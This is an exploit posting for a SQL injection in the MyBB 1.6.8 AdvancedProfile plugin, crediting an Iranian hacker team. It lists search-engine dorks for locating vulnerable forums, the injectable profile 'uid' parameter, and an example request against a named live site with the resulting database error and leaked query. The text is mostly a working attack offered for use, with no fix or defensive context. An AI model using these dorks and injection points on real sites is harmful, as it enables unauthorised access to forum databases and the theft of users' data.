MyBB version 1.6.8 with AdvancedProfile version 3.1 suffers from a remote SQL injection vulnerability.
01e778b0a02d17d71a5dd3bb617a7f133b48d0e905266433e04f2d1924c4abd3
-------------------- IN The NAme OF God --------------------
-====MyBB 1.6.8 Sql Injection Vulnerability====-
# Exploit Title: MyBB 1.6.8 Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# Script Site : http://mybb.com
# MAil : No0PM[at]yahoo[dot]com
-====Dork====-
inurl:member.php?action=profile&uid=
inurl:action=profile&uid=27
-====Exploit====-
http://www.Site.com/forums/member.php?action=profile&uid=[Sqli]
-====Example====-
http://www.mihanhack.com/forums/member.php?action=profile&uid=9
http://www.mihanhack.com/forums/member.php?action=profile&uid=9'
-====information====-
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0'
-====Tnx To====-
Just Persian Gulf ~~~~ > W3 Are Persian Hackerz
MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...
And All IraNHAck Security Team Members
iranhack.org